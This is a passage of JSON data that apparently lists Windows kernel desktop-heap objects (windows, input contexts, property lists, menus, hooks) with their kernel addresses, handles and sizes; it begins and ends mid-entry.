x2007b","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d500601b70","Type":"INPUTCONTEXT","Handle":"0x2007f","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d500601b00","Type":"INPUTCONTEXT","Handle":"0x20081","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d500601a90","Type":"INPUTCONTEXT","Handle":"0x20083","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d500602040","Type":"INPUTCONTEXT","Handle":"0x100089","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d500601e50","Type":"WINDOW","Handle":"0x40094","Size":25,"UnusedBytes":20},{"Block":"0xffffc8d500600f10","Type":"INPUTCONTEXT","Handle":"0x10095","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d50061ff80","Type":"WINDOW","Handle":"0x40096","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d500602bf0","Type":"WINDOW:PROPLIST","Size":2,"UnusedBytes":8},{"Block":"0xffffc8d5006022e0","Type":"INPUTCONTEXT","Handle":"0x80097","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d5006025d0","Type":"WINDOW","Handle":"0x20098","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d500602100","Type":"WINDOW","Handle":"0x2009a","Size":25,"
UnusedBytes":20},{"Block":"0xffffc8d500602d50","Type":"WINDOW","Handle":"0x1009c","Size":25,"UnusedBytes":20},{"Block":"0xffffc8d500603000","Type":"WINDOW","Handle":"0x1009e","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d500603280","Type":"WINDOW","Handle":"0x100a0","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d500621700","Type":"INPUTCONTEXT","Handle":"0x300a1","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d500603520","Type":"WINDOW","Handle":"0x100a2","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d500603810","Type":"WINDOW","Handle":"0x100a4","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d500627b60","Type":"WINDOW","Handle":"0x300a6","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d50061b1d0","Type":"WINDOW:PROPLIST","Size":2,"UnusedBytes":8},{"Block":"0xffffc8d500603d80","Type":"WINDOW","Handle":"0x100aa","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d50060f670","Type":"INPUTCONTEXT","Handle":"0x300ab","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d500603f40","Type":"WINDOW","Handle":"0x100ac","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d500603ac0","Type":"INPUTCONTEXT","Handle":"0x100ad","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d500604350","Type":"WINDOW","Handle":"0x100ae","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d5006045c0","Type":"WINDOW","Handle":"0x100b0","Size":25,"UnusedBytes":20},{"Block":"0xffffc8d500604860","Type":"WINDOW","Handle":"0x100b2","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d500604d30","Type":"WINDOW","Handle":"0x200b4","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d500625d40","Type":"WINDOW:PROPLIST","Size":15,"UnusedBytes":8},{"Block":"0xffffc8d500604ed0","Type":"WINDOW","Handle":"0x100b6","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d500604ab0","Type":"INPUTCONTEXT","Handle":"0x100b7","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d500605130","Type":"WINDOW","Handle":"0x200b8","Size":25,"UnusedBytes":20},{"Block":"0xffffc8d500604b20","Type":"INPUTCONTEXT","Handle":"0x100b9","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d500605370","T
ype":"WINDOW","Handle":"0x100ba","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d5006050c0","Type":"WINDOW:PROPLIST","Size":2,"UnusedBytes":8},{"Block":"0xffffc8d5006055c0","Type":"WINDOW","Handle":"0x100bc","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d5006092a0","Type":"WINDOW:PROPLIST","Size":3,"UnusedBytes":8},{"Block":"0xffffc8d500604c00","Type":"INPUTCONTEXT","Handle":"0x100bd","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d500605820","Type":"WINDOW","Handle":"0x100be","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d5006059e0","Type":"WINDOW:PROPLIST","Size":3,"UnusedBytes":8},{"Block":"0xffffc8d500620690","Type":"INPUTCONTEXT","Handle":"0x1500bf","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d500605b30","Type":"WINDOW","Handle":"0x100c0","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d500609a50","Type":"WINDOW:PROPLIST","Size":5,"UnusedBytes":24},{"Block":"0xffffc8d500605e40","Type":"WINDOW","Handle":"0x100c2","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d500606040","Type":"WINDOW:PROPLIST","Size":4,"UnusedBytes":8},{"Block":"0xffffc8d500608180","Type":"INPUTCONTEXT","Handle":"0x200c3","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d5006061e0","Type":"WINDOW","Handle":"0x100c4","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d500606360","Type":"WINDOW:PROPLIST","Size":3,"UnusedBytes":8},{"Block":"0xffffc8d500606440","Type":"WINDOW","Handle":"0x100c6","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d5006065c0","Type":"WINDOW:PROPLIST","Size":2,"UnusedBytes":8},{"Block":"0xffffc8d500606640","Type":"WINDOW","Handle":"0x100c8","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d500608350","Type":"WINDOW:PROPLIST","Size":4,"UnusedBytes":24},{"Block":"0xffffc8d5006067e0","Type":"WINDOW","Handle":"0x100ca","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d5006069a0","Type":"WINDOW:PROPLIST","Size":3,"UnusedBytes":8},{"Block":"0xffffc8d500609250","Type":"INPUTCONTEXT","Handle":"0x200cb","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d500606c90","Type":"WINDOW","Handle":"0x100cc","Size":
24,"UnusedBytes":16},{"Block":"0xffffc8d50060ab60","Type":"WINDOW:PROPLIST","Size":5,"UnusedBytes":8},{"Block":"0xffffc8d500606e10","Type":"WINDOW","Handle":"0x100ce","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d500607170","Type":"WINDOW:PROPLIST","Size":4,"UnusedBytes":8},{"Block":"0xffffc8d500606ff0","Type":"WINDOW","Handle":"0x100d0","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d50061d600","Type":"WINDOW:PROPLIST","Size":3,"UnusedBytes":8},{"Block":"0xffffc8d500609ff0","Type":"INPUTCONTEXT","Handle":"0x200d1","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d5006071b0","Type":"WINDOW","Handle":"0x100d2","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d500606fb0","Type":"WINDOW:PROPLIST","Size":2,"UnusedBytes":8},{"Block":"0xffffc8d500607420","Type":"WINDOW","Handle":"0x100d4","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d5006075a0","Type":"WINDOW:PROPLIST","Size":3,"UnusedBytes":8},{"Block":"0xffffc8d5006075d0","Type":"WINDOW","Handle":"0x100d6","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d5006098b0","Type":"WINDOW:PROPLIST","Size":5,"UnusedBytes":8},{"Block":"0xffffc8d500607790","Type":"WINDOW","Handle":"0x100d8","Size":25,"UnusedBytes":20},{"Block":"0xffffc8d500611e10","Type":"INPUTCONTEXT","Handle":"0x300d9","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d500607980","Type":"WINDOW","Handle":"0x100da","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d500609900","Type":"WINDOW:PROPLIST","Size":5,"UnusedBytes":8},{"Block":"0xffffc8d50062bed0","Type":"MENU","Handle":"0x500db","Size":10,"UnusedBytes":8},{"Block":"0xffffc8d50062c070","Type":"MENU:ITEMS","Size":73,"UnusedBytes":16},{"Block":"0xffffc8d500607c30","Type":"WINDOW","Handle":"0x100dc","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d50061e280","Type":"WINDOW:PROPLIST","Size":2,"UnusedBytes":8},{"Block":"0xffffc8d500607db0","Type":"WINDOW","Handle":"0x100de","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d500609860","Type":"WINDOW:PROPLIST","Size":5,"UnusedBytes":8},{"Block":"0xffffc8d50060ae20","Type":"INPUTCONTEX
T","Handle":"0x100df","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d500607fd0","Type":"WINDOW","Handle":"0x100e0","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d5006097b0","Type":"WINDOW:PROPLIST","Size":3,"UnusedBytes":8},{"Block":"0xffffc8d5006081d0","Type":"WINDOW","Handle":"0x100e2","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d500608390","Type":"WINDOW:PROPLIST","Size":3,"UnusedBytes":8},{"Block":"0xffffc8d5006083c0","Type":"WINDOW","Handle":"0x100e4","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d500609820","Type":"WINDOW:PROPLIST","Size":4,"UnusedBytes":8},{"Block":"0xffffc8d500615320","Type":"INPUTCONTEXT","Handle":"0x400e5","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d500608580","Type":"WINDOW","Handle":"0x100e6","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d50061aac0","Type":"WINDOW:PROPLIST","Size":4,"UnusedBytes":8},{"Block":"0xffffc8d50060c980","Type":"INPUTCONTEXT","Handle":"0x300e7","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d500608750","Type":"WINDOW","Handle":"0x100e8","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d500608700","Type":"WINDOW:PROPLIST","Size":2,"UnusedBytes":8},{"Block":"0xffffc8d50060cb50","Type":"INPUTCONTEXT","Handle":"0x100e9","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d5006088d0","Type":"WINDOW","Handle":"0x100ea","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d500608a70","Type":"WINDOW:PROPLIST","Size":3,"UnusedBytes":8},{"Block":"0xffffc8d500608aa0","Type":"WINDOW","Handle":"0x100ec","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d500608a50","Type":"WINDOW:PROPLIST","Size":2,"UnusedBytes":8},{"Block":"0xffffc8d500608d00","Type":"WINDOW","Handle":"0x100ee","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d5006090a0","Type":"WINDOW:PROPLIST","Size":3,"UnusedBytes":8},{"Block":"0xffffc8d500608eb0","Type":"WINDOW","Handle":"0x100f0","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d500609070","Type":"WINDOW:PROPLIST","Size":3,"UnusedBytes":8},{"Block":"0xffffc8d5006090d0","Type":"WINDOW","Handle":"0x100f2","Size":24,"UnusedBytes":16
},{"Block":"0xffffc8d5006092d0","Type":"WINDOW:PROPLIST","Size":4,"UnusedBytes":8},{"Block":"0xffffc8d500609310","Type":"WINDOW","Handle":"0x100f4","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d500607fa0","Type":"WINDOW:PROPLIST","Size":3,"UnusedBytes":8},{"Block":"0xffffc8d50060e080","Type":"INPUTCONTEXT","Handle":"0x700f5","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d500609490","Type":"WINDOW","Handle":"0x100f6","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d500607950","Type":"WINDOW:PROPLIST","Size":3,"UnusedBytes":8},{"Block":"0xffffc8d50060d0a0","Type":"INPUTCONTEXT","Handle":"0x100f7","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d500609610","Type":"WINDOW","Handle":"0x100f8","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d500607b50","Type":"WINDOW:PROPLIST","Size":3,"UnusedBytes":8},{"Block":"0xffffc8d5006127d0","Type":"INPUTCONTEXT","Handle":"0xb00f9","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d50060ac40","Type":"WINDOW","Handle":"0x200fa","Size":25,"UnusedBytes":20},{"Block":"0xffffc8d500613ac0","Type":"INPUTCONTEXT","Handle":"0xa00fb","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d5006271e0","Type":"WINDOW","Handle":"0x300fc","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d500609e70","Type":"WINDOW","Handle":"0x100fe","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d50060b9c0","Type":"WINDOW:PROPLIST","Size":7,"UnusedBytes":24},{"Block":"0xffffc8d50060cd20","Type":"INPUTCONTEXT","Handle":"0x400ff","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d50060a0f0","Type":"WINDOW","Handle":"0x10100","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d50060abb0","Type":"WINDOW:PROPLIST","Size":6,"UnusedBytes":8},{"Block":"0xffffc8d50060f700","Type":"INPUTCONTEXT","Handle":"0x20101","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d50060a350","Type":"WINDOW","Handle":"0x10102","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d50060aa40","Type":"WINDOW:PROPLIST","Size":3,"UnusedBytes":8},{"Block":"0xffffc8d500621180","Type":"MENU","Handle":"0x60103","Size":10,"UnusedBytes":8},{"Block":
"0xffffc8d500628430","Type":"MENU:ITEMS","Size":73,"UnusedBytes":16},{"Block":"0xffffc8d50060a4d0","Type":"WINDOW","Handle":"0x10104","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d50060a650","Type":"WINDOW:PROPLIST","Size":3,"UnusedBytes":8},{"Block":"0xffffc8d50060eab0","Type":"INPUTCONTEXT","Handle":"0x20105","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d50060a850","Type":"WINDOW","Handle":"0x10106","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d50060a9d0","Type":"WINDOW:PROPLIST","Size":7,"UnusedBytes":24},{"Block":"0xffffc8d5006116b0","Type":"HOOK","Handle":"0x20107","Size":7,"UnusedBytes":16},{"Block":"0xffffc8d50060af20","Type":"WINDOW","Handle":"0x2010a","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d500619880","Type":"INPUTCONTEXT","Handle":"0x1010b","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d50060b090","Type":"WINDOW","Handle":"0x1010c","Size":24,"UnusedBytes":8},{"Block":"0xffffc8d50061a4c0","Type":"INPUTCONTEXT","Handle":"0x1010d","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d50060b2c0","Type":"WINDOW","Handle":"0x1010e","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d50060b4f0","Type":"WINDOW","Handle":"0x10110","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d500618a80","Type":"WINDOW:PROPLIST","Size":12,"UnusedBytes":8},{"Block":"0xffffc8d50060b670","Type":"WINDOW","Handle":"0x10112","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d50060b7f0","Type":"WINDOW","Handle":"0x10114","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d50060baa0","Type":"WINDOW","Handle":"0x10116","Size":25,"UnusedBytes":20},{"Block":"0xffffc8d50060bc30","Type":"WINDOW","Handle":"0x10118","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d50060c040","Type":"WINDOW:PROPLIST","Size":2,"UnusedBytes":8},{"Block":"0xffffc8d50061a510","Type":"INPUTCONTEXT","Handle":"0x10119","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d50060be90","Type":"WINDOW","Handle":"0x1011a","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d50060ba30","Type":"WINDOW:PROPLIST","Size":5,"UnusedBytes":8},{"Block":"0xffffc8d50
061aa00","Type":"INPUTCONTEXT","Handle":"0x1011b","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d50060c130","Type":"WINDOW","Handle":"0x1011c","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d50060b9a0","Type":"WINDOW:PROPLIST","Size":2,"UnusedBytes":8},{"Block":"0xffffc8d50061aa70","Type":"INPUTCONTEXT","Handle":"0x1011d","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d50060c360","Type":"WINDOW","Handle":"0x1011e","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d500609050","Type":"WINDOW:PROPLIST","Size":2,"UnusedBytes":8},{"Block":"0xffffc8d50061ab00","Type":"INPUTCONTEXT","Handle":"0x10121","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d50060c810","Type":"WINDOW","Handle":"0x10122","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d50060c670","Type":"WINDOW:PROPLIST","Size":2,"UnusedBytes":8},{"Block":"0xffffc8d50061ab70","Type":"INPUTCONTEXT","Handle":"0x10123","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d50060c9d0","Type":"WINDOW","Handle":"0x10124","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d50061abe0","Type":"INPUTCONTEXT","Handle":"0x10125","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d50060cba0","Type":"WINDOW","Handle":"0x10126","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d5006039c0","Type":"MENU","Handle":"0x20127","Size":10,"UnusedBytes":8},{"Block":"0xffffc8d500621750","Type":"MENU:ITEMS","Size":73,"UnusedBytes":16},{"Block":"0xffffc8d50060cdb0","Type":"WINDOW","Handle":"0x10128","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d500604b70","Type":"INPUTCONTEXT","Handle":"0x20129","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d50060cf20","Type":"WINDOW","Handle":"0x1012a","Size":24,"UnusedBytes":8},{"Block":"0xffffc8d50061aef0","Type":"INPUTCONTEXT","Handle":"0x1012b","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d50060d0f0","Type":"WINDOW","Handle":"0x1012c","Size":25,"UnusedBytes":20},{"Block":"0xffffc8d500610980","Type":"MENU","Handle":"0x3012d","Size":10,"UnusedBytes":8},{"Block":"0xffffc8d5006273c0","Type":"MENU:ITEMS","Size":73,"UnusedBytes":16},{"Block":"0xfff
fc8d50060d2b0","Type":"WINDOW","Handle":"0x1012e","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d50060d450","Type":"WINDOW","Handle":"0x10130","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d50061c7d0","Type":"INPUTCONTEXT","Handle":"0x20131","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d50060d700","Type":"WINDOW","Handle":"0x10132","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d50060d880","Type":"WINDOW:PROPLIST","Size":3,"UnusedBytes":8},{"Block":"0xffffc8d50061b380","Type":"INPUTCONTEXT","Handle":"0x10133","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d50060d9c0","Type":"WINDOW","Handle":"0x10134","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d50060db70","Type":"WINDOW:PROPLIST","Size":4,"UnusedBytes":8},{"Block":"0xffffc8d50060dbb0","Type":"WINDOW","Handle":"0x10136","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d50060dd30","Type":"WINDOW","Handle":"0x10138","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d50060deb0","Type":"WINDOW","Handle":"0x1013a","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d50061bf50","Type":"INPUTCONTEXT","Handle":"0x7013b","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d50060e180","Type":"WINDOW","Handle":"0x1013c","Size":25,"UnusedBytes":20},{"Block":"0xffffc8d50061b9c0","Type":"INPUTCONTEXT","Handle":"0x3013d","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d50060e3c0","Type":"WINDOW","Handle":"0x1013e","Size":25,"UnusedBytes":20},{"Block":"0xffffc8d50060e6a0","Type":"WINDOW","Handle":"0x10140","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d50061bcf0","Type":"INPUTCONTEXT","Handle":"0x10141","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d50060e900","Type":"WINDOW","Handle":"0x10142","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d500617ef0","Type":"INPUTCONTEXT","Handle":"0x10143","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d50060ec00","Type":"WINDOW","Handle":"0x10144","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d50060edf0","Type":"WINDOW","Handle":"0x10146","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d5006170d0","Type":"INPUTCONTEXT","Hand
le":"0x180147","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d50060f0c0","Type":"WINDOW","Handle":"0x10148","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d5006028f0","Type":"INPUTCONTEXT","Handle":"0x80149","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d50060f4f0","Type":"WINDOW","Handle":"0x1014a","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d50060f750","Type":"WINDOW","Handle":"0x1014c","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d50060f920","Type":"WINDOW:PROPLIST","Size":6,"UnusedBytes":8},{"Block":"0xffffc8d50060fa30","Type":"WINDOW","Handle":"0x1014e","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d50060fc00","Type":"WINDOW:PROPLIST","Size":6,"UnusedBytes":8},{"Block":"0xffffc8d50060c080","Type":"INPUTCONTEXT","Handle":"0x5014f","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d50060fc60","Type":"WINDOW","Handle":"0x10150","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d50060fde0","Type":"WINDOW:PROPLIST","Size":6,"UnusedBytes":8},{"Block":"0xffffc8d50060fe40","Type":"WINDOW","Handle":"0x10152","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d50060ffc0","Type":"WINDOW:PROPLIST","Size":6,"UnusedBytes":8},{"Block":"0xffffc8d50061c8b0","Type":"HOOK","Handle":"0x10153","Size":7,"UnusedBytes":16},{"Block":"0xffffc8d500610020","Type":"WINDOW","Handle":"0x10154","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d5006101a0","Type":"WINDOW:PROPLIST","Size":6,"UnusedBytes":8},{"Block":"0xffffc8d500610200","Type":"WINDOW","Handle":"0x10156","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d500610380","Type":"WINDOW:PROPLIST","Size":6,"UnusedBytes":8},{"Block":"0xffffc8d5006103e0","Type":"WINDOW","Handle":"0x10158","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d500610560","Type":"WINDOW:PROPLIST","Size":6,"UnusedBytes":8},{"Block":"0xffffc8d50060fbb0","Type":"INPUTCONTEXT","Handle":"0x50159","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d5006105c0","Type":"WINDOW","Handle":"0x1015a","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d500610740","Type":"WINDOW:PROPLIST","Size":6,"UnusedBytes"
:8},{"Block":"0xffffc8d5006110f0","Type":"INPUTCONTEXT","Handle":"0x1015b","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d5006107a0","Type":"WINDOW","Handle":"0x1015c","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d500610920","Type":"WINDOW:PROPLIST","Size":6,"UnusedBytes":8},{"Block":"0xffffc8d500611160","Type":"INPUTCONTEXT","Handle":"0x1015d","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d500610a20","Type":"WINDOW","Handle":"0x1015e","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d5006121f0","Type":"INPUTCONTEXT","Handle":"0x2015f","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d500610c90","Type":"WINDOW","Handle":"0x10160","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d5006121a0","Type":"INPUTCONTEXT","Handle":"0x90161","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d500610f20","Type":"WINDOW","Handle":"0x10162","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d5006110c0","Type":"WINDOW:PROPLIST","Size":3,"UnusedBytes":8},{"Block":"0xffffc8d5006111b0","Type":"WINDOW","Handle":"0x10164","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d500612710","Type":"INPUTCONTEXT","Handle":"0x10167","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d5006114f0","Type":"WINDOW","Handle":"0x10168","Size":25,"UnusedBytes":20},{"Block":"0xffffc8d500612780","Type":"INPUTCONTEXT","Handle":"0x10169","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d500611820","Type":"WINDOW","Handle":"0x1016a","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d500620620","Type":"INPUTCONTEXT","Handle":"0xb016b","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d500611a90","Type":"WINDOW","Handle":"0x1016c","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d500611c10","Type":"WINDOW:PROPLIST","Size":2,"UnusedBytes":8},{"Block":"0xffffc8d500612860","Type":"INPUTCONTEXT","Handle":"0x1016d","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d50060c4e0","Type":"WINDOW","Handle":"0x2016e","Size":25,"UnusedBytes":20},{"Block":"0xffffc8d5006128d0","Type":"INPUTCONTEXT","Handle":"0x1016f","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d500611e60","Typ
e":"WINDOW","Handle":"0x10170","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d500612000","Type":"WINDOW","Handle":"0x10172","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d500613210","Type":"INPUTCONTEXT","Handle":"0x10173","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d500612350","Type":"WINDOW","Handle":"0x10174","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d500613280","Type":"INPUTCONTEXT","Handle":"0x10175","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d5006124c0","Type":"WINDOW","Handle":"0x10176","Size":25,"UnusedBytes":20},{"Block":"0xffffc8d500613ba0","Type":"INPUTCONTEXT","Handle":"0x10177","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d500612bb0","Type":"WINDOW","Handle":"0x10178","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d500612e00","Type":"WINDOW","Handle":"0x1017a","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d500613080","Type":"WINDOW","Handle":"0x1017c","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d500613cc0","Type":"INPUTCONTEXT","Handle":"0x1017d","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d5006133c0","Type":"WINDOW","Handle":"0x1017e","Size":26,"UnusedBytes":16},{"Block":"0xffffc8d500614120","Type":"WINDOW:PROPLIST","Size":12,"UnusedBytes":8},{"Block":"0xffffc8d500613d10","Type":"HOOK","Handle":"0x2017f","Size":7,"UnusedBytes":16},{"Block":"0xffffc8d5006135f0","Type":"WINDOW","Handle":"0x10180","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d500613770","Type":"WINDOW:PROPLIST","Size":2,"UnusedBytes":8},{"Block":"0xffffc8d500613ef0","Type":"INPUTCONTEXT","Handle":"0x10181","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d500621d90","Type":"WINDOW","Handle":"0x20182","Size":25,"UnusedBytes":20},{"Block":"0xffffc8d500613f40","Type":"INPUTCONTEXT","Handle":"0x10183","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d5006141e0","Type":"WINDOW","Handle":"0x20184","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d500613dc0","Type":"INPUTCONTEXT","Handle":"0x10185","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d500614350","Type":"WINDOW","Handle":"0x10186","Size":23,"U
nusedBytes":8},{"Block":"0xffffc8d500614040","Type":"INPUTCONTEXT","Handle":"0x10187","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d500614510","Type":"WINDOW","Handle":"0x10188","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d5006140b0","Type":"INPUTCONTEXT","Handle":"0x10189","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d500614680","Type":"WINDOW","Handle":"0x1018a","Size":26,"UnusedBytes":16},{"Block":"0xffffc8d50061bd40","Type":"WINDOW:PROPLIST","Size":14,"UnusedBytes":8},{"Block":"0xffffc8d500613fb0","Type":"INPUTCONTEXT","Handle":"0x1018b","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d5006148b0","Type":"WINDOW","Handle":"0x1018c","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d500614a30","Type":"WINDOW:PROPLIST","Size":2,"UnusedBytes":8},{"Block":"0xffffc8d500614cc0","Type":"WINDOW","Handle":"0x1018e","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d5006144c0","Type":"INPUTCONTEXT","Handle":"0x1018f","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d500614e80","Type":"WINDOW","Handle":"0x10190","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d500615150","Type":"WINDOW","Handle":"0x10192","Size":25,"UnusedBytes":20},{"Block":"0xffffc8d5006153d0","Type":"WINDOW","Handle":"0x10194","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d500614b00","Type":"HOOK","Handle":"0x10195","Size":7,"UnusedBytes":16},{"Block":"0xffffc8d500615900","Type":"WINDOW","Handle":"0x10196","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d500614a70","Type":"INPUTCONTEXT","Handle":"0x10197","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d500615b50","Type":"WINDOW","Handle":"0x10198","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d500615dd0","Type":"WINDOW","Handle":"0x1019a","Size":23,"UnusedBytes